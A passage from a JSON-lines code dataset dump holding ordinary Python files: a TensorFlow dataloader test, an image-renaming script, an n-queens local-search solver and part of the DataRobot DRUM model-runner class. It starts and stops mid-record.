\"初中\", \"高中\", \"本科\", \"研究生\", \"博士\"]\n#最大公约数\ndef gcd(a,b):\n if a= rows\n assert rows == (60 * 24 * 3 + 1)\n\n # if num_samples is equal to batch size,\n # we didn't exhaust the iterator and do\n # cleanup. 
Try that now\n if num_samples == batch_size:\n try:\n next(data_itr)\n except StopIteration:\n pass\n else:\n raise ValueError\n assert not data_itr._working\n assert data_itr._batch_itr is None\n\n # check start of next epoch to ensure consistency\n X, y = next(data_itr)\n for _y, _y0 in zip(y, y0):\n assert (_y.numpy() == _y0.numpy()).all()\n\n for column, x in X.items():\n x0 = X0.pop(column)\n assert (x.numpy() == x0.numpy()).all()\n assert len(X0) == 0\n\n data_itr.stop()\n assert not data_itr._working\n assert data_itr._batch_itr is None\n","sub_path":"tests/unit/test_tf_dataloader.py","file_name":"test_tf_dataloader.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"176514945","text":"\"\"\" Change all Image Filenames from name.jpeg to name_0.jpeg \"\"\"\nfrom config.config import cfg_path, cfg_model\nimport os\n\npath_images = cfg_path['images'] + 'all'\nlabel_directories = os.listdir(path_images)\n\nfor label in label_directories:\n for image in os.listdir(path_images + os.path.sep + label):\n if '_0' not in image:\n new_prefix = image.split(\".\")[0] + \"_0\"\n new_name = new_prefix + \".jpeg\"\n os.rename(\n path_images + os.path.sep + label + os.path.sep + image,\n path_images + os.path.sep + label + os.path.sep + new_name)\n","sub_path":"transfer_learning/db/snapshot_wisconsin/change_image_file_names.py","file_name":"change_image_file_names.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"206157656","text":"\n# coding: utf-8\n\n# In[276]:\n\n\nfrom numpy import *\nimport random\nimport operator\nfrom copy import deepcopy\n\n\n# In[277]:\n\n\nsize = 1000\nqueen_mat = mat(zeros((size, size)), dtype=int)\n# print(queen_mat)\n\n\n# In[278]:\n\n\nrandom_order = list(range(0, size))\nrandom.shuffle(random_order)\n# print(random_order)\npos = 
deepcopy(random_order)\n\n\n# In[279]:\n\n\n# print(queen_mat[0,0])\n\n\n# In[280]:\n\n\n# queen_mat[0,0] = 1\ndef draw_mat(pos, size):\n _mat = mat(zeros((size, size)), dtype=int)\n for i in range(0, size):\n _mat[i, pos[i]] = 1\n print(_mat)\n \n# draw_mat(pos, size)\n\n\n# In[281]:\n\n\ndef check_pos(x, size, pos):\n conflicts = 0\n y = pos[x]\n for i in range(0, size):\n if i != x:\n j = x+y-i\n if j in range(0, size) and pos[i] == j:\n conflicts += 1\n j = y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflicts += 1\n if pos[i] == y:\n conflicts += 1\n\n return conflicts\n\n# In[282]:\n\n\ndef cal_conflict(pos, size, conflict=None):\n if conflict is None:\n conflict = dict()\n for i in range(0, size):\n conflict[i] = check_pos(i, size, pos)\n# print(conflict)\n return conflict\n \n# print(cal_conflict(pos, size))\n\n\n# In[283]:\n\n\ndef sum_conflict(conflict):\n return sum(list(conflict.values()))\n\n\ndef swap_rows(pos, i, j):\n pos[i], pos[j] = pos[j], pos[i]\n\n\ndef modify_conflict_with_swap(conflict, pos, x1, x2, size):\n old_x1 = conflict[x1]\n old_x2 = conflict[x2]\n if old_x1 != check_pos(x1, size, pos) or old_x2 != check_pos(x2, size, pos):\n print(\"Err\")\n y1 = pos[x1]\n y2 = pos[x2]\n t = 0\n for i in range(0, size):\n if i != x1 and i != x2:\n j1 = x1 + y1 - i\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] -= 1\n t -= 1\n j1 = y1 - (x1 - i)\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] -= 1\n t -= 1\n j2 = x2 + y2 - i\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] -= 1\n t -= 1\n j2 = y2 - (x2 - i)\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] -= 1\n t -= 1\n pos[x1] = y2\n pos[x2] = y1\n y1 = pos[x1]\n y2 = pos[x2]\n for i in range(0, size):\n if i != x1 and i != x2:\n j1 = x1 + y1 - i\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] += 1\n t += 1\n j1 = y1 - (x1 - i)\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] += 1\n t += 1\n j2 = x2 + y2 - i\n if j2 in range(0, 
size) and pos[i] == j2:\n conflict[i] += 1\n t += 1\n j2 = y2 - (x2 - i)\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] += 1\n t += 1\n conflict[x1] = check_pos(x1, size, pos)\n conflict[x2] = check_pos(x2, size, pos)\n t += conflict[x1] - old_x1 + conflict[x2] - old_x2\n # print(\"modified: \", t)\n return t\n\n\ndef modify_conflict_with_move(conflict, pos, x, new_y, size):\n old_y = pos[x]\n old_conflicts = conflict[x]\n t = 0\n if old_y == new_y:\n return 0\n for i in range(0, size):\n if i != x:\n j = x + old_y - i\n if j in range(0, size) and pos[i] == j:\n conflict[i] -= 1\n t -= 1\n j = old_y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflict[i] -= 1\n t -= 1\n if pos[i] == old_y:\n conflict[i] -= 1\n t -= 1\n pos[x] = new_y\n for i in range(0, size):\n if i != x:\n j = x + new_y - i\n if j in range(0, size) and pos[i] == j:\n conflict[i] += 1\n t += 1\n j = new_y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflict[i] += 1\n t += 1\n if pos[i] == new_y:\n conflict[i] += 1\n t += 1\n conflict[x] = check_pos(x, size, pos)\n t += conflict[x] - old_conflicts\n return t\n\n\ndef local_search(size, pos, sum_of_conflict, conflict=None):\n if conflict is None:\n conflict = cal_conflict(pos, size)\n\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\",sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n \n # sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # max_x = max(*conflict.items(), key=operator.itemgetter(1))[0]\n # x1 = max_x\n # print(\"max_x: \", max_x)\n # print(pos)\n # print(sorted_conflict)\n # ################\n # x1 = sorted_conflict[0][0]\n # max_x = sorted_conflict[0][0]\n x1 = random.choice(list(range(0, size)))\n print(\"x1: \", x1)\n min_conflicts = check_pos(x1, size, pos)\n origin_conflicts = min_conflicts\n min_y = pos[x1]\n old_y = pos[x1]\n some_choices = list()\n for new_y in range(0, size):\n pos[x1] = new_y\n new_conflicts = check_pos(x1, size, 
pos)\n if new_conflicts <= min_conflicts:\n min_conflicts = new_conflicts\n min_y = new_y\n some_choices.append(new_y)\n if min_conflicts == origin_conflicts:\n min_y = random.choice(some_choices)\n # pos[x1] = old_y\n # return 1\n pos[x1] = old_y\n modified = modify_conflict_with_move(conflict, pos, x1, min_y, size)\n new_conflict += modified\n return new_conflict\n\n # swap_rows(pos, x1, random.choice(list(range(0, size))))\n # print(\"random\")\n # modify_conflict_with_swap(conflict, pos, x1, random.choice(list(range(0, size))), size)\n # # return local_search(size, pos, conflict)\n # return sum_conflict(conflict)\n # ###########################\n # for new_y in range(0, size):\n # modify_conflict_with_move(conflict, pos, max_x, new_y, size)\n # if sum_conflict(conflict) < sum_of_conflict:\n # return sum_conflict(conflict)\n # # else:\n # # modify_conflict_with_move(conflict, pos, max_x, new_y, size)\n # # swap_rows(pos, x1, random.choice(list(range(0, size))))\n # print(\"random\")\n # modify_conflict_with_move(conflict, pos, max_x, random.choice(list(range(0, size))), size)\n # # return local_search(size, pos, conflict)\n # return sum_conflict(conflict)\n\n\ndef local_search_1(size, pos, sum_of_conflict, conflict=None):\n if conflict is None:\n conflict = cal_conflict(pos, size)\n\n # sum_of_conflict = sum_conflict(conflict)\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\", sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # x1 = sorted_conflict[0][0]\n x1 = 0\n x2 = 0\n modified = 0\n for begin_index in range(0, size-1):\n x1 = sorted_conflict[begin_index][0]\n # x2 = pos[x1]\n print(\"x1 :\", x1, end=\" \")\n for x_2 in sorted_conflict[begin_index+1:]:\n x2 = x_2[0]\n # print(\"begin swap\")\n modified = modify_conflict_with_swap(conflict, pos, x1, x2, size)\n new_conflict += modified\n # print(\"finish swap\")\n # 
print(sum_conflict(conflict))\n if new_conflict < sum_of_conflict:\n print(\"x2: \", x2)\n return new_conflict\n modified = modify_conflict_with_swap(conflict, pos, x1, x2, size)\n new_conflict += modified\n print(\"something bad\")\n modified = modify_conflict_with_swap(conflict, pos, x1, random.choice(range(0, size)), size)\n new_conflict += modified\n return new_conflict\n\n\ndef local_search_2(size, pos, sum_of_conflict, conflict=None):\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\", sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # x1 = sorted_conflict[0][0]\n x1 = 0\n x2 = 0\n modified = 0\n range_list = list(range(0, size))\n random.shuffle(range_list)\n for begin_index in range(0, size-1):\n x1 = sorted_conflict[begin_index][0]\n y1 = pos[x1]\n # x2 = pos[x1]\n print(\"x1 :\", x1, end=\" \")\n for new_y in range_list:\n modified = modify_conflict_with_move(conflict, pos, x1, new_y, size)\n new_conflict += modified\n if modified < 0:\n print(\"modified: \", modified, end=\" \")\n print(\"y: \", new_y)\n return new_conflict\n modified = modify_conflict_with_move(conflict, pos, x1, y1, size)\n new_conflict += modified\n print(\"something bad\")\n modified = modify_conflict_with_move(conflict, pos, x1, random.choice(range_list), size)\n new_conflict += modified\n return new_conflict\n\n\nprint(\"Initializing....\")\nconflict = dict()\ncal_conflict(pos, size, conflict)\nprint(\"Begin to iterate\")\ncnt = 0\nsum_of_conflict = sum_conflict(conflict)\nsum_of_conflict = local_search_1(size, pos, sum_of_conflict, conflict)\nwhile sum_of_conflict:\n cnt += 1\n sum_of_conflict = local_search_1(size, pos, sum_of_conflict, conflict)\n # print('')\n # draw_mat(pos, size)\nprint(sum_of_conflict)\ndraw_mat(pos, size)\nprint(\"cnt: \", cnt)\ncal_conflict(pos, size, 
conflict)\nprint(sum_conflict(conflict))","sub_path":"timetabling/timetabling/n_queen_localsearch.py","file_name":"n_queen_localsearch.py","file_ext":"py","file_size_in_byte":9535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"325107816","text":"import copy\nimport glob\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport time\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nfrom progress.spinner import Spinner\nfrom tempfile import mkdtemp, NamedTemporaryFile\n\nimport numpy as np\nimport pandas as pd\n\nfrom memory_profiler import memory_usage\nfrom mlpiper.pipeline.executor import Executor\nfrom mlpiper.pipeline.executor_config import ExecutorConfig\nfrom mlpiper.pipeline import json_fields\n\nfrom datarobot_drum.drum.common import (\n ArgumentsOptions,\n ArgumentOptionsEnvVars,\n CUSTOM_FILE_NAME,\n JavaArtifacts,\n JuliaArtifacts,\n LOG_LEVELS,\n LOGGER_NAME_PREFIX,\n PythonArtifacts,\n RArtifacts,\n RunLanguage,\n RunMode,\n TemplateType,\n TargetType,\n verbose_stdout,\n read_model_metadata_yaml,\n ModelMetadataKeys,\n get_metadata,\n)\nfrom datarobot_drum.drum.description import version as drum_version\nfrom datarobot_drum.drum.exceptions import DrumCommonException, DrumPredException\nfrom datarobot_drum.drum.perf_testing import CMRunTests\nfrom datarobot_drum.drum.push import drum_push, setup_validation_options\nfrom datarobot_drum.drum.templates_generator import CMTemplateGenerator\nfrom datarobot_drum.drum.typeschema_validation import SchemaValidator\nfrom datarobot_drum.drum.utils import (\n CMRunnerUtils,\n handle_missing_colnames,\n StructuredInputReadUtils,\n)\nfrom datarobot_drum.profiler.stats_collector import StatsCollector, StatsOperation\n\nimport docker.errors\n\nSERVER_PIPELINE = \"prediction_server_pipeline.json.j2\"\nPREDICTOR_PIPELINE = \"prediction_pipeline.json.j2\"\n\n\nclass CMRunner:\n def 
__init__(self, runtime):\n self.runtime = runtime\n self.options = runtime.options\n self.options.model_config = read_model_metadata_yaml(self.options.code_dir)\n self.logger = CMRunner._config_logger(runtime.options)\n self.verbose = runtime.options.verbose\n self.run_mode = RunMode(runtime.options.subparser_name)\n self.raw_arguments = sys.argv\n self.target_type = None\n\n self._resolve_target_type()\n self._resolve_class_labels()\n\n self._functional_pipelines = {\n (RunMode.FIT, RunLanguage.PYTHON): \"python_fit.json.j2\",\n (RunMode.FIT, RunLanguage.R): \"r_fit.json.j2\",\n }\n\n # require metadata for push mode\n if self.run_mode == RunMode.PUSH:\n get_metadata(self.options)\n\n if self.run_mode in [RunMode.FIT, RunMode.PUSH]:\n # always populate the validator, even if info isn't provided. Use the default type schema if no\n # schema is provided, strict validation is enabled, and the target type is transform\n type_schema = {}\n use_default_type_schema = False\n strict_validation = not self.options.disable_strict_validation\n if self.options.model_config:\n type_schema = self.options.model_config.get(\"typeSchema\", {})\n\n if not type_schema and strict_validation and self.target_type == TargetType.TRANSFORM:\n print(\n \"WARNING: No type schema provided. For transforms, we enforce using the default type schema to \"\n \"ensure there are no conflicts with other tasks downstream. 
Disable strict validation if you do \"\n \"not want to use the default type schema.\"\n )\n use_default_type_schema = True\n\n self.schema_validator = SchemaValidator(\n type_schema=type_schema,\n strict=strict_validation,\n use_default_type_schema=use_default_type_schema,\n verbose=self.verbose,\n )\n self._input_df = None\n\n @property\n def input_df(self):\n if self._input_df is None:\n # Lazy load df\n self._input_df = StructuredInputReadUtils.read_structured_input_file_as_df(\n self.options.input\n )\n return self._input_df\n\n def _resolve_target_type(self):\n if self.run_mode == RunMode.NEW:\n return\n\n target_type_options = getattr(self.options, \"target_type\", None)\n target_type_options = (\n None if target_type_options is None else TargetType(target_type_options)\n )\n target_type_model_config = None\n\n if self.options.model_config is not None:\n target_type_model_config = TargetType(self.options.model_config[\"targetType\"])\n\n if target_type_options is None and target_type_model_config is None:\n raise DrumCommonException(\n \"Target type is missing. It must be provided in --target-type argument, {} env var or model config file.\".format(\n ArgumentOptionsEnvVars.TARGET_TYPE\n )\n )\n elif (\n all([target_type_options, target_type_model_config])\n and target_type_options != target_type_model_config\n ):\n raise DrumCommonException(\n \"Target type provided in --target-type argument doesn't match target type from model config file. 
\"\n \"Use either one of them or make them match.\"\n )\n else:\n self.target_type = (\n target_type_options if target_type_options is not None else target_type_model_config\n )\n\n if self.target_type != TargetType.UNSTRUCTURED:\n if getattr(self.options, \"query\", None):\n raise DrumCommonException(\n \"--query argument can be used only with --target-type unstructured\"\n )\n if getattr(self.options, \"content_type\", None):\n raise DrumCommonException(\n \"--content-type argument can be used only with --target-type unstructured\"\n )\n else:\n if self.options.content_type is None:\n self.options.content_type = \"text/plain; charset=utf8\"\n\n def _resolve_class_labels(self):\n if self.run_mode in [RunMode.NEW] or (\n self.run_mode == RunMode.PUSH\n and self.options.model_config[ModelMetadataKeys.TYPE] == \"training\"\n ):\n self.options.positive_class_label = None\n self.options.negative_class_label = None\n self.options.class_labels = None\n self.options.class_labels_file = None\n return\n\n if self.target_type == TargetType.BINARY:\n pos_options = getattr(self.options, \"positive_class_label\", None)\n neg_options = getattr(self.options, \"negative_class_label\", None)\n\n try:\n pos_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"positiveClassLabel\")\n neg_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"negativeClassLabel\")\n except AttributeError:\n pos_model_config = neg_model_config = None\n\n if (\n not all([pos_options, neg_options])\n and not all([pos_model_config, neg_model_config])\n and self.run_mode != RunMode.FIT\n ):\n raise DrumCommonException(\n \"Positive/negative class labels are missing. 
They must be provided with either one: {}/{} arguments, environment variables, model config file.\".format(\n ArgumentsOptions.POSITIVE_CLASS_LABEL, ArgumentsOptions.NEGATIVE_CLASS_LABEL\n )\n )\n elif all([pos_options, neg_options, pos_model_config, neg_model_config]) and (\n pos_options != pos_model_config or neg_options != neg_model_config\n ):\n raise DrumCommonException(\n \"Positive/negative class labels provided with command arguments or environment variable don't match values from model config file. \"\n \"Use either one of them or make them match.\"\n )\n else:\n self.options.positive_class_label = (\n pos_options if pos_options is not None else pos_model_config\n )\n\n self.options.negative_class_label = (\n neg_options if neg_options is not None else neg_model_config\n )\n\n elif self.target_type == TargetType.MULTICLASS:\n labels_options = getattr(self.options, \"class_labels\", None)\n try:\n labels_model_config = self.options.model_config.get(\n ModelMetadataKeys.INFERENCE_MODEL\n ).get(\"classLabels\")\n except AttributeError:\n labels_model_config = None\n\n if (\n labels_options is None\n and labels_model_config is None\n and self.run_mode != RunMode.FIT\n ):\n raise DrumCommonException(\n \"Class labels are missing. They must be provided with either one: {}/{} arguments, environment variables, model config file.\".format(\n ArgumentsOptions.CLASS_LABELS, ArgumentsOptions.CLASS_LABELS_FILE\n )\n )\n # both not None but not set() equal\n elif all([labels_options, labels_model_config]) and set(labels_options) != set(\n labels_model_config\n ):\n raise DrumCommonException(\n \"Class labels provided with command arguments or environment variable don't match values from model config file. 
\"\n \"Use either one of them or make them match.\"\n )\n else:\n self.options.class_labels = (\n labels_options if labels_options is not None else labels_model_config\n )\n else:\n self.options.positive_class_label = None\n self.options.negative_class_label = None\n self.options.class_labels = None\n self.options.class_labels_file = None\n\n @staticmethod\n def _config_logger(options):\n logging.getLogger().setLevel(LOG_LEVELS[options.logging_level])\n logging.getLogger(\"werkzeug\").setLevel(LOG_LEVELS[options.logging_level])\n return logging.getLogger(LOGGER_NAME_PREFIX)\n\n def get_logger(self):\n return self.logger\n\n def _print_verbose(self, message):\n if self.verbose:\n print(message)\n\n def _print_welcome_header(self):\n mode_headers = {\n RunMode.SERVER: \"Detected REST server mode - this is an advanced option\",\n RunMode.SCORE: \"Detected score mode\",\n RunMode.PERF_TEST: \"Detected perf-test mode\",\n RunMode.VALIDATION: \"Detected validation check mode\",\n RunMode.FIT: \"Detected fit mode\",\n RunMode.NEW: \"Detected template generation mode\",\n RunMode.PUSH: \"Detected push mode\",\n }\n self._print_verbose(mode_headers[self.run_mode])\n\n def _check_artifacts_and_get_run_language(self):\n lang = getattr(self.options, \"language\", None)\n if lang:\n return RunLanguage(self.options.language)\n\n code_dir_abspath = os.path.abspath(self.options.code_dir)\n\n artifact_language = None\n custom_language = None\n # check which artifacts present in the code dir\n python_artifacts = CMRunnerUtils.find_files_by_extensions(\n code_dir_abspath, PythonArtifacts.ALL\n )\n r_artifacts = CMRunnerUtils.find_files_by_extensions(code_dir_abspath, RArtifacts.ALL)\n\n java_artifacts = CMRunnerUtils.find_files_by_extensions(code_dir_abspath, JavaArtifacts.ALL)\n\n julia_artifacts = CMRunnerUtils.find_files_by_extensions(\n code_dir_abspath, JuliaArtifacts.ALL\n )\n\n # check which custom code files present in the code dir\n is_custom_py = 
CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.py\")\n is_custom_r = CMRunnerUtils.filename_exists_and_is_file(\n code_dir_abspath, \"custom.R\"\n ) or CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.r\")\n is_custom_jl = CMRunnerUtils.filename_exists_and_is_file(code_dir_abspath, \"custom.jl\")\n\n # if all the artifacts belong to the same language, set it\n if (\n bool(len(python_artifacts))\n + bool(len(r_artifacts))\n + bool(len(java_artifacts))\n + bool(len(julia_artifacts))\n == 1\n ):\n if len(python_artifacts) > 0:\n artifact_language = RunLanguage.PYTHON\n elif len(r_artifacts) > 0:\n artifact_language = RunLanguage.R\n elif len(java_artifacts) > 0:\n artifact_language = RunLanguage.JAVA\n elif len(julia_artifacts) > 0:\n artifact_language = RunLanguage.JULIA\n\n # if only one custom file found, set it:\n if is_custom_py + is_custom_r + is_custom_jl == 1:\n if is_custom_py:\n custom_language = RunLanguage.PYTHON\n elif is_custom_r:\n custom_language = RunLanguage.R\n else:\n custom_language = RunLanguage.JULIA\n\n # if both language values are None, or both are not None and not equal\n if (\n bool(custom_language) + bool(artifact_language) == 0\n or bool(custom_language) + bool(artifact_language) == 2\n and custom_language != artifact_language\n ):\n error_mes = (\n \"Can not detect language by artifacts and/or custom.py/R files.\\n\"\n \"Detected: language by artifacts - {}; language by custom - {}.\\n\"\n \"Code directory must have one or more model artifacts belonging to the same language:\\n\"\n \"Python/R/Java/Julia, with an extension:\\n\"\n \"Python models: {}\\n\"\n \"R models: {}\\n\"\n \"Java models: {}.\\n\"\n \"Julia models: {}.\\n\"\n \"Or one of custom.py/R files.\".format(\n \"None\" if artifact_language is None else artifact_language.value,\n \"None\" if custom_language is None else custom_language.value,\n PythonArtifacts.ALL,\n RArtifacts.ALL,\n JavaArtifacts.ALL,\n JuliaArtifacts.ALL,\n )\n )\n 
all_files_message = \"\\n\\nFiles(100 first) found in {}:\\n{}\\n\".format(\n code_dir_abspath, \"\\n\".join(sorted(os.listdir(code_dir_abspath))[0:100])\n )\n\n error_mes += all_files_message\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n run_language = custom_language if custom_language is not None else artifact_language\n self.options.language = run_language.value\n return run_language\n\n def _get_fit_run_language(self):\n def raise_no_language(custom_language):\n custom_language = \"None\" if custom_language is None else custom_language.value\n error_mes = (\n \"Can not detect language by custom.py/R/jl files.\\n\"\n \"Detected: language by custom - {}.\\n\"\n \"Code directory must have either a custom.py/R file\\n\"\n \"Or a python file using the drum_autofit() wrapper.\".format(custom_language,)\n )\n all_files_message = \"\\n\\nFiles(100 first) found in {}:\\n{}\\n\".format(\n code_dir_abspath, \"\\n\".join(sorted(os.listdir(code_dir_abspath))[0:100])\n )\n\n error_mes += all_files_message\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n def raise_multiple_custom_files(py_paths, r_paths, jl_paths):\n files_found = py_paths + r_paths + jl_paths\n error_mes = (\n \"Multiple custom.py/R/jl files were identified in the code directories sub directories.\\n\"\n \"If using the output directory option select a directory that does not contain additional \"\n \"output directories or code directories.\\n\\n\"\n \"The following custom model files were found:\\n\"\n )\n error_mes += \"\\n\".join([str(path) for path in files_found])\n self.logger.error(error_mes)\n raise DrumCommonException(error_mes)\n\n code_dir_abspath = os.path.abspath(self.options.code_dir)\n\n custom_language = None\n run_language = None\n is_py = False\n\n # check which custom code files present in the code dir\n custom_py_paths = list(Path(code_dir_abspath).rglob(\"{}.py\".format(CUSTOM_FILE_NAME)))\n custom_r_paths = 
list(Path(code_dir_abspath).rglob(\"{}.[rR]\".format(CUSTOM_FILE_NAME)))\n custom_jl_paths = list(Path(code_dir_abspath).rglob(\"{}.jl\".format(CUSTOM_FILE_NAME)))\n\n # subdirectories also contain custom py/R files, likely an incorrectly selected output dir.\n if len(custom_py_paths) + len(custom_r_paths) + len(custom_jl_paths) > 1:\n raise_multiple_custom_files(custom_py_paths, custom_r_paths, custom_jl_paths)\n # if only one custom file found, set it:\n elif len(custom_py_paths) == 1:\n custom_language = RunLanguage.PYTHON\n elif len(custom_r_paths) == 1:\n custom_language = RunLanguage.R\n elif len(custom_jl_paths) == 1:\n custom_language = RunLanguage.Julia\n # if no custom files, look for any other python file to use\n elif len(custom_py_paths) + len(custom_r_paths) == 0:\n\n other_py = list(Path(code_dir_abspath).rglob(\"*.py\"))\n\n other_r = list(Path(code_dir_abspath).rglob(\"*.r\")) + list(\n Path(code_dir_abspath).rglob(\"*.R\")\n )\n\n # if we find any py files and no R files set python, otherwise raise\n if len(other_py) > 0 and len(other_r) == 0:\n is_py = True\n else:\n raise_no_language(custom_language)\n\n # otherwise, we're in trouble\n else:\n raise_no_language(custom_language)\n\n if custom_language is not None:\n run_language = custom_language\n elif is_py:\n run_language = RunLanguage.PYTHON\n return run_language\n\n def run(self):\n try:\n if self.options.docker and (\n self.run_mode not in (RunMode.PUSH, RunMode.PERF_TEST, RunMode.VALIDATION)\n ):\n ret = self._run_inside_docker(self.options, self.run_mode, self.raw_arguments)\n if ret:\n raise DrumCommonException(\"Error from docker process: {}\".format(ret))\n return\n except DrumCommonException as e:\n self.logger.error(e)\n raise\n except AttributeError as e:\n # In some parser the options.docker does not exists\n if \"docker\" not in str(e):\n raise e\n\n self._print_welcome_header()\n\n if self.run_mode in [RunMode.SERVER, RunMode.SCORE]:\n 
self._run_fit_or_predictions_pipelines_in_mlpiper()\n elif self.run_mode == RunMode.FIT:\n self.run_fit()\n elif self.run_mode == RunMode.PERF_TEST:\n CMRunTests(self.options, self.run_mode).performance_test()\n elif self.run_mode == RunMode.VALIDATION:\n CMRunTests(self.options, self.run_mode, self.target_type).validation_test()\n elif self.run_mode == RunMode.NEW:\n self._generate_template()\n elif self.run_mode == RunMode.PUSH:\n options, run_mode, raw_arguments = setup_validation_options(copy.deepcopy(self.options))\n validation_runner = CMRunner(self.runtime)\n validation_runner.options = options\n validation_runner.run_mode = run_mode\n validation_runner.raw_arguments = raw_arguments\n validation_runner.run()\n print(\n \"Your model was successfully validated locally! Now we will add it into DataRobot\"\n )\n drum_push(self.options)\n else:\n error_message = \"{} mode is not implemented\".format(self.run_mode)\n print(error_message)\n raise DrumCommonException(error_message)\n\n def run_fit(self):\n input_data = self.input_df\n if self.options.target:\n input_data = input_data.drop(self.options.target, axis=1)\n self.schema_validator.validate_inputs(input_data)\n remove_temp_output = None\n if not self.options.output:\n self.options.output = mkdtemp()\n remove_temp_output = self.options.output\n mem_usage = memory_usage(\n self._run_fit_or_predictions_pipelines_in_mlpiper,\n interval=1,\n max_usage=True,\n max_iterations=1,\n )\n if self.options.verbose:\n print(\"Maximum fit memory usage: {}MB\".format(int(mem_usage)))\n if self.options.output or not self.options.skip_predict:\n create_custom_inference_model_folder(self.options.code_dir, self.options.output)\n if not self.options.skip_predict:\n mem_usage = memory_usage(\n self.run_test_predict, interval=1, max_usage=True, max_iterations=1,\n )\n if self.options.verbose:\n print(\"Maximum server memory usage: {}MB\".format(int(mem_usage)))\n pred_str = \" and predictions can be made on the fit model! 
\\n \"\n else:\n pred_str = \"however since you specified --skip-predict, predictions were not made \\n\"\n if remove_temp_output:\n print(\n \"Validation Complete 🎉 Your model can be fit to your data, {}\"\n \"You're ready to add it to DataRobot. \".format(pred_str)\n )\n shutil.rmtree(remove_temp_output)\n else:\n print(\"Success 🎉\")\n\n def run_test_predict(self):\n self.options.code_dir = self.options.output\n self.options.output = os.devnull\n __target_temp = None\n if self.options.target:\n __tempfile = NamedTemporaryFile()\n df = self.input_df\n if self.target_type == TargetType.TRANSFORM:\n target_df = df[self.options.target]\n __target_temp = NamedTemporaryFile()\n target_df.to_csv(__target_temp.name, index=False)\n df = df.drop(self.options.target, axis=1)\n # convert to R-friendly missing fields\n if self._get_fit_run_language() == RunLanguage.R:\n df = handle_missing_colnames(df)\n df.to_csv(__tempfile.name, index=False)\n self.options.input = __tempfile.name\n if self.target_type == TargetType.TRANSFORM:\n CMRunTests(\n self.options, self.run_mode, self.target_type, self.schema_validator\n ).check_transform_server(__target_temp)\n else:\n try:\n CMRunTests(\n self.options, self.run_mode, self.target_type, self.schema_validator\n ).check_prediction_side_effects()\n except DrumPredException as e:\n self.logger.warning(e)\n\n def _generate_template(self):\n CMTemplateGenerator(\n template_type=TemplateType.MODEL,\n language=RunLanguage(self.options.language),\n dir=self.options.code_dir,\n ).generate()\n\n def _prepare_prediction_server_or_batch_pipeline(self, run_language):\n options = self.options\n functional_pipeline_name = (\n SERVER_PIPELINE if self.run_mode == RunMode.SERVER else PREDICTOR_PIPELINE\n )\n functional_pipeline_filepath = CMRunnerUtils.get_pipeline_filepath(functional_pipeline_name)\n # fields to replace in the pipeline\n replace_data = {\n \"positiveClassLabel\": options.positive_class_label,\n \"negativeClassLabel\": 
options.negative_class_label,\n \"classLabels\": options.class_labels,\n \"customModelPath\": os.path.abspath(options.code_dir),\n \"run_language\": run_language.value,\n \"monitor\": options.monitor,\n \"model_id\": options.model_id,\n \"deployment_id\": options.deployment_id,\n \"monitor_settings\": options.monitor_settings,\n \"query_params\": '\"{}\"'.format(options.query)\n if getattr(options, \"query\", None) is not None\n else \"null\",\n \"content_type\": '\"{}\"'.format(options.content_type)\n if getattr(options, \"content_type\", None) is not None\n else \"null\",\n \"target_type\": self.target_type.value,\n }\n\n if self.run_mode == RunMode.SCORE:\n replace_data.update(\n {\n \"input_filename\": options.input,\n \"output_filename\": '\"{}\"'.format(options.output) if options.output else \"null\",\n }\n )\n else:\n host_port_list = options.address.split(\":\", 1)\n host = host_port_list[0]\n port = int(host_port_list[1]) if len(host_port_list) == 2 else None\n replace_data.update(\n {\n \"host\": host,\n \"port\": port,\n \"show_perf\": str(options.show_perf).lower(),\n \"engine_type\": \"RestModelServing\" if options.production else \"Generic\",\n \"component_type\": \"uwsgi_serving\"\n if options.production\n else \"prediction_server\",\n \"uwsgi_max_workers\": options.max_workers\n if getattr(options, \"max_workers\")\n else \"null\",\n \"single_uwsgi_worker\": (options.max_workers == 1),\n \"deployment_config\": '\"{}\"'.format(options.deployment_config)\n if getattr(options, \"deployment_config\", None) is not None\n else \"null\",\n }\n )\n\n functional_pipeline_str = CMRunnerUtils.render_file(\n functional_pipeline_filepath, replace_data\n )\n\n if self.run_mode == RunMode.SERVER:\n if options.production:\n pipeline_json = json.loads(functional_pipeline_str)\n # Because of tech debt in MLPiper which requires that the modelFileSourcePath key\n # be filled with something, we're putting in a dummy file path here\n if 
